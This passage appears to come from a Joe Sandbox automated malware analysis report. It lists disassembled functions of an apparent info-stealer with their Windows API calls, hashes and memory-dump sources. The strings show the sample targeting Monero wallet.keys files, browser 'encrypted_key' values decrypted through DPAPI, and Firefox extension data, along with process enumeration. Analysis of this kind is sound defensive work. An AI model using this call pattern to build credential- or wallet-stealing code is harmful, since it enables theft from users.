                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 544f4f250235a2db49a6444e92ab9cdd8a7661379b79ca212598aae891b02cdf
                                      • Instruction ID: 22b38f68e90a9974c668bfbcb0e5a754c6e0c1662939a27e96f6fb2a52e193d6
                                      • Opcode Fuzzy Hash: 544f4f250235a2db49a6444e92ab9cdd8a7661379b79ca212598aae891b02cdf
                                      • Instruction Fuzzy Hash: 66E11A729501189BEB15FBA8DCA2EEE7339EF14300F408599F51672091EF356A4CCB72
                                      Function 00D3D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D581
                                      • lstrlen.KERNEL32(00000000), ref: 00D3D798
                                      • lstrlen.KERNEL32(00000000), ref: 00D3D7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D3D82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 3e24be0bc1db61addcc820aec1a4685ecd973f55e6208dac94536329c4a39c8e
                                      • Instruction ID: c55e6c6bfb4bdff0f7c70200d0100168acfecf6ede92721f4aff2e2ec8b7911c
                                      • Opcode Fuzzy Hash: 3e24be0bc1db61addcc820aec1a4685ecd973f55e6208dac94536329c4a39c8e
                                      • Instruction Fuzzy Hash: A3910D729501189BDB15FFA8DCA2EEE7339EF54340F508569F51672091EF346A08CB72
                                      Function 00D3D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D901
                                      • lstrlen.KERNEL32(00000000), ref: 00D3DA9F
                                      • lstrlen.KERNEL32(00000000), ref: 00D3DAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D3DB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: c44d8cf638d157fcfda2917dd2ab97a7502b983c6ebc788cc145874c8e2008ce
                                      • Instruction ID: 69b7ee1a96616536f01a8e9ed84c2a3f8085fc18c44a1776ab9b506cfc43836a
                                      • Opcode Fuzzy Hash: c44d8cf638d157fcfda2917dd2ab97a7502b983c6ebc788cc145874c8e2008ce
                                      • Instruction Fuzzy Hash: BD812D729501189BDF14FFA8DCA2EEE7339EF54340F404569F506A2092EF356A08CB72
                                      Function 00DAFED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: e125139a3a4cc496fa37a05f82a6f55edc1fceb5f0873a3e21f61909b3694e0f
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: 4A51E372501206EFEB259F94C841BBA7BA4FF02301F2841ADF90647591E731ED44DBB0
                                      Function 00D3A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00D3A664
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 6cd9c885b3bef6623de324e75ea9d1dd23e5cb8be553c9e7216491e49727ddb6
                                      • Instruction ID: fa953001ec0828ae73674e904c9f6151165c72dea3986189e2a1ca409f312c90
                                      • Opcode Fuzzy Hash: 6cd9c885b3bef6623de324e75ea9d1dd23e5cb8be553c9e7216491e49727ddb6
                                      • Instruction Fuzzy Hash: E6511D75A50208AFDB24DFA8CD96BED7775EF44344F008118E94A5B291DBB0AA05CB71
                                      Function 00D3F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00D51678,00D50D93), ref: 00D3F64C
                                      • lstrlen.KERNEL32(00000000), ref: 00D3F66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: 03944c5f2eed8723c2bb1ffb69608740ee7d5922946e58fe378f5ca9cb8f827b
                                      • Instruction ID: 9fe6783b7628f380a9ed84990139616e9d32834b53ca4b0564e0607912bc5465
                                      • Opcode Fuzzy Hash: 03944c5f2eed8723c2bb1ffb69608740ee7d5922946e58fe378f5ca9cb8f827b
                                      • Instruction Fuzzy Hash: FD51F876D401089BDB04FFA8DDA2DEE7379EF54340F408569F91667191EE346A08CB72
                                      Function 00D437B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: fe08e5ed42ff1b4013008160f79e299128a6aa6d52624c4593eb32e54df24672
                                      • Instruction ID: b61850637ef412c6ab703a06a45d690f9afc53da8840f486747365eec018f58c
                                      • Opcode Fuzzy Hash: fe08e5ed42ff1b4013008160f79e299128a6aa6d52624c4593eb32e54df24672
                                      • Instruction Fuzzy Hash: 01411C71D102099FDF04EFA8D855AEEB778EF58304F048418F91676290EB74AA08CFB2
                                      Function 00D3A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D3A489
                                        • Part of subcall function 00D3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A23F
                                        • Part of subcall function 00D3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00D34F3E,00000000,?), ref: 00D3A251
                                        • Part of subcall function 00D3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A27A
                                        • Part of subcall function 00D3A210: LocalFree.KERNEL32(?,?,?,?,00D34F3E,00000000,?), ref: 00D3A28F
                                        • Part of subcall function 00D3A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D3A2D4
                                        • Part of subcall function 00D3A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00D3A2F3
                                        • Part of subcall function 00D3A2B0: LocalFree.KERNEL32(?), ref: 00D3A323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: df641449687349de258959993088d5af8792b29dcf596917ee66acb6c4d37972
                                      • Instruction ID: 5663922f891eef2f86ba33640a0f94dcd9c2059a75b06e11e3fe22935a775def
                                      • Opcode Fuzzy Hash: df641449687349de258959993088d5af8792b29dcf596917ee66acb6c4d37972
                                      • Instruction Fuzzy Hash: 2D3130B6E00209ABDF14DBE8DC45AEEB7B8EB58300F044518E941A7281E7359A04CB72
                                      Function 00D48810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00D505BF), ref: 00D4885A
                                      • Process32First.KERNEL32(?,00000128), ref: 00D4886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00D48883
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • CloseHandle.KERNEL32(?), ref: 00D488F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
